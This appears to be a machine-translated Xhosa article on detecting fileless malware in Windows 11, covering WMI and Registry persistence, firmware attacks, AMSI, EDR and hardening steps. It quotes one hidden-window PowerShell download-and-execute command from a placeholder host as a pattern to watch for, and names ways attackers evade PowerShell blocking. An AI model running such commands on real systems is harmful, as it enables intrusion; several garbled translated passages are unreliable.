Uyifumana njani i-malware eyingozi engenafayili ngaphakathi Windows 11

¿Uyifumana njani i-malware eyingozi? Umsebenzi wokuhlaselwa kweFayile ukhule kakhulu, kwaye ukwenza izinto zibe mbi ngakumbi, Windows 11 ayikhuselekangaLe ndlela idlula idiski kwaye ixhomekeke kwimemori kunye nezixhobo zenkqubo esemthethweni; yiyo loo nto iinkqubo ze-antivirus esekwe kwisiginitsha zisokola. Ukuba ukhangela indlela ethembekileyo yokuyibhaqa, impendulo ikukudibanisa telemetry, uhlalutyo lokuziphatha, kunye nolawulo lweWindows.

Kwi-ecosystem yangoku, amaphulo asebenzisa kakubi i-PowerShell, i-WMI, okanye i-Mshta ahlala kunye neendlela ezintsonkothileyo ezinje ngenaliti yememori, ukuzingisa "ngaphandle kokuchukumisa" idiski, kunye nokuba firmware kakubiIsitshixo kukuqonda imephu yosongelo, izigaba zohlaselo, kwaye zeziphi iimpawu abazishiyayo naxa yonke into isenzeka ngaphakathi kwe-RAM.

Yintoni i-malware engenafayile kwaye kutheni iyinkxalabo kuyo Windows 11?

Xa sithetha ngezoyikiso "ezingenafayile", sibhekisa kwikhowudi ekhohlakeleyo Awudingi ukufaka izinto ezintsha eziphunyeziweyo. kwisixokelelwano sefayile ukusebenza. Idla ngokutofwa kwiinkqubo ezisebenzayo kwaye isetyenziswe kwi-RAM, kuxhomekeke kwiitoliki kunye nokubini okusayinwe nguMicrosoft (umzekelo, PowerShell, WMI, rundll32, mshtaOku kunciphisa unyawo lwakho kwaye kukuvumela ukuba udlule iinjini ezijonga kuphela iifayile ezikrokrelekayo.

Kwanamaxwebhu eofisi okanye iiPDF ezixhaphaza ubuthathaka ekuqaliseni imiyalelo zithathwa njengenxalenye yento, kuba vula ufezekiso kwinkumbulo ngaphandle kokushiya iibhinari eziluncedo zokuhlalutya. Ukusetyenziswa kakubi kwe iimakhro kunye neDDE KwiOfisi, kuba ikhowudi isebenza kwiinkqubo ezisemthethweni njengeWinWord.

Abahlaseli badibanisa ubunjineli bezentlalo (ubuqhetseba, amakhonkco espam) kunye nemigibe yobugcisa: ukucofa komsebenzisi kuqala ikhonkco apho iskripthi sikhuphela kwaye siphumeze umthwalo wokugqibela kwinkumbulo, ukuphepha ukushiya umkhondo kwidiski. Iinjongo zisusela kubusela bedatha ukuya kumiliselo lwe-ransomware, ukuya kwintshukumo ethe cwaka esecaleni.

Iintlobo ngeenyawo kwinkqubo: ukusuka 'kubunyulu' ukuya kwimixube

Ukunqanda iikhonsepthi ezibhidayo, kuyanceda ukwahlula izoyikiso ngokwenqanaba lokusebenzisana nesixokelelwano sefayile. Olu luhlu luyacacisa yintoni eqhubekayo, ikhowudi ihlala phi, kwaye yiyiphi imiqondiso eyishiyayo?.

Chwetheza I: akukho msebenzi wefayile

I-malware engenafayile ngokupheleleyo ayibhali nto kwidiski. Umzekelo oqhelekileyo kukusebenzisa a ukuba sesichengeni kwenethiwekhi (njenge-EternalBlue vector emva kwemini) ukuphumeza i-backdoor ehlala kwimemori ye-kernel (amatyala afana ne-DoublePulsar). Apha, yonke into yenzeka kwi-RAM kwaye azikho izinto zakudala kwinkqubo yefayile.

Enye inketho kukungcolisa i firmware yamacandelo: i-BIOS/UEFI, iiadaptha zothungelwano, iiperipherals ze-USB (ubuchule bohlobo lwe-BadUSB) okanye iinkqubo ezisezantsi ze-CPU. Ziyaqhubeka ngokuqalisa ngokutsha kunye nokufakwa kwakhona, kunye nobunzima okongeziweyo Iimveliso ezimbalwa zihlola i-firmwareOlu luhlaselo oluntsonkothileyo, olungaphantsi rhoqo, kodwa luyingozi ngenxa yobuchwephesha kunye nokuqina.

Uhlobo II: Umsebenzi wogcino-nkcukacha olungangqalanga

Apha, i-malware "ayishiyi" esebenzayo, kodwa isebenzisa izikhongozeli ezilawulwa yinkqubo ezigcinwe njengefayile. Umzekelo, ngasemva ukuba isityalo imiyalelo ye-powershell kwindawo yokugcina ye-WMI kwaye iqalise ukuphunyezwa kwayo ngezihluzi zesiganeko. Kuyenzeka ukuyifaka kumgca womyalelo ngaphandle kokulahla iibhinari, kodwa indawo yokugcina ye-WMI ihlala kwidiski njengesiseko sedatha esisemthethweni, okwenza kube nzima ukuyicoca ngaphandle kokuchaphazela inkqubo.

Ukusuka kwimbono ebonakalayo zithathwa njengezingenafayile, kuba eso sikhongozeli (WMI, Registry, etc.) Ayisiyonto yakudala enokubonwa ephunyezwayo Yaye ukucocwa kwayo akuyonto ingenamsebenzi. Isiphumo: ukuzingisa okufihlakeleyo kunye nomkhondo omncinci "wemveli".

Uhlobo III: Ifuna iifayile ukuba zisebenze

Ezinye iimeko zigcina a 'okungenafayile' ukuzingisa Kwinqanaba elinengqiqo, bafuna i-trigger-based trigger. Umzekelo oqhelekileyo ngu Kovter: ibhalisa isenzi seqokobhe kulwandiso olungakhethiyo; xa ifayile enolwandiso ivulwa, iscript esincinci esisebenzisa i-mshta.exe siyaqaliswa, esakha kwakhona umtya onobungozi kwiRejistri.

Iqhinga kukuba ezi fayile "zithiyelo" ezinolwandiso olungakhethiyo aluqulathanga umthwalo ohlalutywayo, kwaye ubuninzi bekhowudi buhlala kwi. ukubhalisa (esinye isikhongozeli). Yiyo loo nto behlelwa njengabangenafayile kwimpembelelo, nangona bethetha ngokungqongqo baxhomekeke kwidiski enye okanye ngaphezulu kwezinto zakudala njenge-trigger.

Izilwanyana kunye 'nemikhosi' yosulelo: apho lungena khona nalapho luzimela khona

Ukuphucula ukufunyaniswa, kubalulekile ukubeka imephu indawo yokungena kunye nomkhosi wosulelo. Lo mbono unceda ukuyila ulawulo oluthile Beka phambili i-telemetry efanelekileyo.

zobuqhawe

• Ifayile esekwe (Uhlobo lwe-III): Amaxwebhu, aphunyeziweyo, iifayile zeFlash/Java zelifa, okanye iifayile ze-LNK zinokuxhaphaza isikhangeli okanye i-injini ezisebenzisayo ukulayisha i-shellcode kwimemori. I-vector yokuqala yifayile, kodwa umthwalo wokuhlawula uhamba ukuya kwi-RAM.
• Network-based (Uhlobo loku-I): Ipakethe exhaphaza ukuba sesichengeni (umzekelo, kwi-SMB) ifezekisa umiliselo kumhlaba wabasebenzisi okanye kwi-kernel. IWannaCry yandisa le ndlela. Umthwalo wememori ngokuthe ngqo ngaphandle kwefayile entsha.

isibulali

• Izixhobo (Uhlobo I): IDiski okanye i-firmware yekhadi lenethiwekhi ingatshintshwa kwaye ikhowudi yaziswe. Kunzima ukuhlola kwaye kuqhubeke ngaphandle kwe-OS.
• I-CPU kunye neenkqubo ezisezantsi zolawulo (Uhlobo I): Itekhnoloji efana ne-Intel's ME/AMT ibonise iindlela zokuya Uthungelwano kunye nokwenziwa ngaphandle kwe-OSIhlasela kwinqanaba eliphantsi kakhulu, kunye nobuchwephesha obuphezulu.
• i-USB (Uhlobo I): I-BadUSB ikuvumela ukuba uphinde ucwangcise i-USB drive ukuze uzenze ibhodi yezitshixo okanye i-NIC kwaye uqalise imiyalelo okanye uqondise kwakhona itrafikhi.
• I-BIOS / UEFI (Uhlobo I): ukuhlelwa ngokutsha kwe-firmware enobungozi (iimeko ezifana ne-Mebromi) ehamba phambi kweebhutsi zeWindows.
• Isilumkiso (Uhlobo I): Ukusebenzisa i-mini-hypervisor phantsi kwe-OS ukufihla ubukho bayo. Inqabile, kodwa sele ibonwe ngendlela ye-hypervisor rootkits.

Ukubulawa kunye nesitofu

• Ifayile esekwe (Uhlobo lwe-III): I-EXE/DLL/LNK okanye imisebenzi ecwangcisiweyo eqalisa ii-injection kwiinkqubo ezisemthethweni.
• IMacros (Uhlobo lwe-III): I-VBA kwi-Ofisi inokwenza i-decode kwaye iqhube ukuhlawula, kubandakanywa ne-ransomware epheleleyo, ngemvume yomsebenzisi ngokukhohlisa.
• Scripts (Uhlobo II): PowerShell, VBScript okanye JScript ukusuka kwifayile, umgca womyalelo, iinkonzo, uBhaliso okanye i-WMIUmhlaseli unokuchwetheza okushicilelweyo kwiseshoni ekude ngaphandle kokuchukumisa idiski.
• Irekhodi yokuQalisa (MBR/Ukuqalisa) (Uhlobo II): Iintsapho ezifana nePetya zibhala ngaphezulu icandelo le-boot ukuze lithathe ulawulo ekuqaleni. Ingaphandle kwenkqubo yefayile, kodwa ifikeleleke kwi-OS kunye nezisombululo zanamhlanje ezinokuyibuyisela.

Uhlaselo olungenafayile lusebenza njani: izigaba kunye neempawu

Nangona bengazishiyi iifayile eziphunyeziweyo, amaphulo alandela ingqiqo enezigaba. Ukuziqonda kuvumela ukubeka iliso. iziganeko kunye nobudlelwane phakathi kweenkqubo oko kushiya uphawu.

• Ufikelelo lokuqalaUkuhlaselwa ngobuqhetseba kusetyenziswa amakhonkco okanye izincamatheliso, iiwebhusayithi ezisengozini, okanye iinkcukacha ezibiweyo. Amatyathanga amaninzi aqala ngoxwebhu lweOfisi oluqalisa umyalelo PowerShell.
• Ukuzingisa: ngasemva nge-WMI (izihluzi kunye nemirhumo), Izitshixo zokwenziwa kweRejistri okanye imisebenzi ecwangcisiweyo ekwazisa ngokutsha izikripthi ngaphandle kwefayile enobungozi entsha.
• ExfiltrationNje ukuba ulwazi luqokelelwe, luthunyelwa ngaphandle kwenethiwekhi kusetyenziswa iinkqubo ezithembekileyo (izikhangeli, PowerShell, bitsadmin) ukuxuba itrafikhi.

Lo mzekelo awukhohlakali ngakumbi ngenxa yokuba izalathisi zokuhlasela Bazifihla ngokwesiqhelo: iingxoxo zomgca womyalelo, inkqubo yekhonkco, imidibaniso ephuma ngaphandle engaqhelekanga, okanye ukufikelela kwiinaliti ze-API.

Ubuchule obuqhelekileyo: ukusuka kwimemori ukuya ekurekhodeni

Abadlali baxhomekeke kuluhlu lwe iindlela ukuba kwandisa ubuqili. Kuluncedo ukwazi ezona zixhaphakileyo ukwenza ubhaqo olusebenzayo.

• Umhlali kwinkumbulo: Ukulayisha umthwalo kwisithuba senkqubo ethembekileyo elindele ukuqaliswa. i-rootkits kunye neekhonkco Kwi-kernel, baphakamisa izinga lokufihla.
• Ukuzingisa kwiRegistryGcina iiblobhu ezintsonkothileyo kwizitshixo kwaye uzibuyisele kwakhona kwisiqalisi esisemthethweni (mshta, rundll32, wscript). Isifakeli se-ephemeral sinokuzitshabalalisa ukuze sinciphise unyawo lwaso.
• Ubuqhetseba bobuchwepheshaUkusebenzisa amagama asetyenziswayo abiweyo kunye neephasiwedi, umhlaseli wenza iigobolondo ezikude kunye nezityalo ukufikelela cwaka kwiRegistry okanye kwiWMI.
• 'I-Fileless' RansomwareI-Encryption kunye ne-C2 yonxibelelwano iququzelelwe ukusuka kwi-RAM, ukunciphisa amathuba okubona kude kube yilapho umonakalo ubonakala.
• Izixhobo zokusebenza: amatyathanga azenzekelayo abona ubuthathaka kwaye abeke umthwalo wememori kuphela emva kokucofa komsebenzisi.
• Amaxwebhu anekhowudi: iimacros kunye neendlela ezifana neDDE eqalisa imiyalelo ngaphandle kokugcina okuphunyeziweyo kwidiski.

Izifundo zoshishino sele zibonise iincopho eziphawulekayo: kwixesha elilodwa le-2018, a ukwanda okungaphezulu kwe-90% kwiscript-based kunye nokuhlaselwa kwekhonkco le-PowerShell, uphawu lokuba i-vector ikhethwa ngokusebenza kwayo.

Umngeni kwiinkampani kunye nababoneleli: kutheni ukuvimba akwanele

Kuya kuhenda ukukhubaza i-PowerShell okanye uvale iimacros ngonaphakade, kodwa Ubuya kwaphula utyandoI-PowerShell yintsika yolawulo lwangoku kwaye iOfisi ibalulekile kushishino; ukuyivala ngobumfama kudla ngokungenzeki.

Ngaphaya koko, kukho iindlela zokugqitha kulawulo olusisiseko: ukuqhuba i-PowerShell nge-DLLs kunye ne-rundll32, ukupakishwa kwemibhalo kwii-EXEs, Yiza neyakho ikopi yePowerShell okanye ufihle izikripthi kwimifanekiso kwaye uzikhuphele kwinkumbulo. Ngoko ke, ukukhusela akukwazi ukusekelwe kuphela ekuphikeni ubukho bezixhobo.

Enye impazamo eqhelekileyo kukuhambisa sonke isigqibo kwilifu: ukuba iarhente kufuneka ilinde impendulo evela kumncedisi, Ulahlekelwa kuthintelo lwexesha lokwenyaniIdatha yeTelemetry inokulayishwa ukutyebisa ulwazi, kodwa Ukunciphisa kufuneka kwenzeke ekupheleni.

Uyibona njani i-malware engenafayile Windows 11: telemetry kunye nokuziphatha

Iqhinga lokuphumelela li esweni iinkqubo kunye nenkumbuloHayi iifayile. Iindlela zokuziphatha ezikhohlakeleyo zizinzile ngakumbi kuneefom ezithathwa yifayile, zizenza zilungele iinjini zokuthintela.

• AMSI (Antimalware Scan Interface)Ithintela iPowerShell, iVBScript, okanye izikripthi zeJScript naxa zakhiwe ngamandla kwinkumbulo. Ilungele ukubamba imitya efihliweyo ngaphambi kokubulawa.
• Ukuhlolwa kwenkqubo: qala/ukugqiba, iPID, abazali nabantwana, iindlela, imigca yomyalelo kunye neehashes, kunye nemithi yokubulawa ukuqonda ibali elipheleleyo.
• Uhlalutyo lwenkumbulo: ukufunyanwa kweenaliti, ukubonakaliswa okanye imithwalo ye-PE ngaphandle kokuchukumisa idiski, kunye nokuphononongwa kwemimandla engaqhelekanga ephunyeziweyo.
• Ukhuseleko lwecandelo lokuqala: ulawulo kunye nokubuyiselwa kwe-MBR/EFI kwimeko yokuphazamisa.

Kwi-ecosystem yeMicrosoft, i-Defender ye-Endpoint idibanisa i-AMSI, esweni ukuziphathaUkuskena inkumbulo kunye nokufunda koomatshini abasekwe kwilifu kusetyenziswa ukukala ukubhaqwa ngokuchasene nokwahluka okutsha okanye okungaqondakaliyo. Abanye abathengisi basebenzisa iindlela ezifanayo ngeenjini ezihlala kwi-kernel.

Umzekelo wokwenyani wonxulumano: ukusuka kuxwebhu ukuya kwi-PowerShell

Yiba nomfanekiso wekhonkco apho i-Outlook ikhuphela isincamatheliso, i-Word ivula uxwebhu, umxholo osebenzayo uvuliwe, kwaye i-PowerShell iqaliswe ngeeparamitha ezikrokrisayo. I-telemetry efanelekileyo iya kubonisa i Umgca wokuyalela (umzekelo, i-ExecutionPolicy Bypass, ifestile efihliweyo), idibanisa kwi-domain engathenjwa kunye nokudala inkqubo yomntwana ezifaka ngokwayo kwi-AppData.

I-arhente enomxholo wendawo iyakwazi yima ubuye umva umsebenzi okhohlakeleyo ngaphandle kokungenelela ngesandla, ngaphezu kokwazisa i-SIEM okanye nge-imeyile / i-SMS. Ezinye iimveliso zongeza ingcambu engunobangela wophawu lomaleko (Imizekelo yohlobo lweStoryLine), ekhomba hayi kwinkqubo ebonakalayo (Umbono/iLizwi), kodwa kwi umsonto okhohlakeleyo ogcweleyo kunye nemvelaphi yayo yokucoca ngokupheleleyo inkqubo.

Ipateni yomyalelo eqhelekileyo ekufuneka uyilumkele inokujongeka ngolu hlobo: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Ingqiqo ayingowona mtya, kodwa isethi yemiqondiso: inkqubo yokudlula, ifestile efihliweyo, ukhuphelo olucacileyo, kunye nophumezo lwenkumbulo.

I-AMSI, umbhobho kunye nendima yomdlali ngamnye: ukusuka ekupheleni ukuya kwi-SOC

Ngaphandle kokufakwa kweskripthi, uyilo olomeleleyo lucwangcisa amanyathelo aququzelela uphando kunye nempendulo. Ubungqina obuninzi ngaphambi kokwenza umthwalo, ngcono., eyona.

• Uthintelo lweskripthiI-AMSI ihambisa umxholo (nokuba iveliswe kwi-fly) yohlalutyo olusisigxina kunye noluguquguqukayo kumbhobho we-malware.
• Imicimbi yenkquboI-PIDs, i-binaries, i-hashes, iindlela, kunye nenye idata iyaqokelelwa. iimpikiswano, ukuseka imithi yenkqubo eyakhokelela kumthwalo wokugqibela.
• Ukufunyanwa kunye nokunika ingxeloUkufunyaniswa kuboniswa kwikhonsoli yemveliso kwaye idluliselwe kumaqonga enethiwekhi (NDR) yokubonwa kwephulo.
• Iziqinisekiso zomsebenzisiNokuba umbhalo ufakwe kwimemori, isakhelo I-AMSI iyayinqanda kwiinguqulelo ezihambelanayo zeWindows.
• Ubunakho bomlawuli: uqwalaselo lomgaqo-nkqubo ukwenza uhlolo lwescript, ukuthintela ukuziphatha-based kunye nokudala iingxelo ezivela kwi-console.
• SOC umsebenzi: ukukhutshwa kwezinto zakudala (VM UUID, uguqulelo lwe-OS, uhlobo lombhalo, inkqubo yomqalisi kunye nomzali wayo, iihashes kunye nemigca yomyalelo) ukuyila kwakhona imbali kunye imithetho yokuphakamisa kwixesha elizayo.

Xa iqonga livumela ukuthumela ngaphandle i isikhumbuzi sememori Ngokunxulunyaniswa nokubulawa, abaphandi banokuvelisa ubhaqo olutsha kwaye batyebise ukhuselo ngokuchasene nokwahluka okufanayo.

Amanyathelo asebenzayo kwi-Windows 11: uthintelo kunye nokuzingela

Ukongeza ekubeni ne-EDR kunye nokuhlolwa kwememori kunye ne-AMSI, Windows 11 ikuvumela ukuba uvale izithuba zokuhlaselwa kwaye uphucule ukubonakala ulawulo lwemveli.

• Ubhaliso kunye nezithintelo kwi-PowerShellYenza iSkripthi sokuLogging kunye nokuLogidwa kweModyuli, isebenzisa iindlela ezithintelweyo apho kunokwenzeka, kwaye ilawula ukusetyenziswa kwe Ukugqitha/kufihliwe.
• Ukuhlaselwa kweMithetho yokuNcitshiswa koMphezulu (ASR).: iibhloko zeskripthi ziqaliswe ngeenkqubo zeOfisi kunye Ukuxhatshazwa kweWMI/PSExec xa kungafunekiyo.
• Iipolisi ezinkulu zeOfisi: ikhubaza ngokungagqibekanga, ukusayinwa okukhulu kwangaphakathi kunye noluhlu olungqongqo lwentembeko; ibeka iliso kwiDDE yelifa.
• Uphicotho lwe-WMI kunye noBhaliso: ibeka iliso kwimirhumo yomsitho kunye nezitshixo ezizenzekelayo (Run, RunOnce, Winlogon), kunye nokudala umsebenzi icwangcisiwe.
• Ukhuseleko lokuqalisa: ivula uKhuseleko lwe-Boot, ijonga ingqibelelo ye-MBR/EFI kwaye iqinisekisa ukuba akukho zilungiso kuqaliso.
• Ukuchwetheza kunye nokuqina: ivala ubuthathaka obusebenzisekayo kwizikhangeli, izinto zeOfisi, kunye neenkonzo zenethiwekhi.
• ukuqonda: iqeqesha abasebenzisi kunye namaqela obugcisa kubuqhetseba kunye nemiqondiso ye ukubulawa ngokufihlakeleyo.

Ukuzingela, gxila kwimibuzo emalunga: ukudala iinkqubo ngeOfisi ukuya kwi-PowerShell/MSHTA, iingxoxo kunye umtya wokukhuphela/khuphela ifayileIzikripthi ezine-obfuscation ecacileyo, iinaliti ezibonakalisayo, kunye nothungelwano oluphumayo kwii-TLD ezikrokrelayo. I-cross-reference le miqondiso enegama kunye nezihlandlo zokunciphisa ingxolo.

Yintoni enokubonwa yinjini nganye namhlanje?

Izisombululo zeshishini likaMicrosoft zidibanisa i-AMSI, uhlalutyo lokuziphatha, jonga inkumbulo kunye nokhuseleko lwecandelo le-boot, kunye nemifuziselo ye-ML esekwe ilifu ukuze isikali ngokuchasene nezoyikiso ezivelayo. Abanye abathengisi baphumeza ukubeka iliso kwinqanaba le-kernel ukwahlula okungalunganga kwisoftware enobungozi kunye nokubuyisela umva ngokuzenzekelayo kotshintsho.

Indlela esekelwe kwi amabali okubulawa Ikuvumela ukuba uchonge unobangela wengcambu (umzekelo, uncamathiselo lwe-Outlook oluqalisa ityathanga) kwaye unciphise umthi wonke: izikripthi, izitshixo, imisebenzi, kunye nokubini okuphakathi, ukuphepha ukuxinga kuphawu olubonakalayo.

Iimpazamo eziqhelekileyo kunye nendlela yokuziphepha

Ukuvala i-PowerShell ngaphandle kwesicwangciso solawulo esisesinye akunakwenzeka nje kuphela, kodwa zikwakhona iindlela zokuyibiza ngokungathanga ngqoOku kuyasebenza nakwi-macros: mhlawumbi ulawula ngemigaqo-nkqubo kunye neesignesha, okanye ishishini liya kubandezeleka. Kungcono ukugxila kwi-telemetry kunye nemithetho yokuziphatha.

Enye impazamo eqhelekileyo kukukholelwa ukuba izicelo ezimhlophe zisombulula yonke into: itekhnoloji engenafayili ixhomekeke ngokuchanekileyo kule nto. apps ezithembekileyoUlawulo kufuneka lujonge into abayenzayo kunye nendlela abanxibelelana ngayo, hayi nje ukuba bavumelekile na.

Ngayo yonke le nto ingasentla, i-malware engenafayile iyayeka ukuba "sisiporho" xa ujonga eyona nto ibalulekileyo: ukuziphatha, inkumbulo, kunye nemvelaphi yokwenziwa ngakunye. Ukudibanisa i-AMSI, inkqubo etyebileyo ye-telemetry, inzalelwane Windows 11 ulawulo, kunye nomaleko we-EDR kunye nohlalutyo lokuziphatha kukunika inzuzo. Yongeza kwi-equation imigaqo-nkqubo yenyani ye-macros kunye ne-PowerShell, i-WMI / iRegistry yophicotho, kunye nokuzingela okubeka phambili imigca yomyalelo kunye nokucwangcisa imithi, kwaye unokhuselo olunqumla la matyathanga ngaphambi kokuba enze isandi.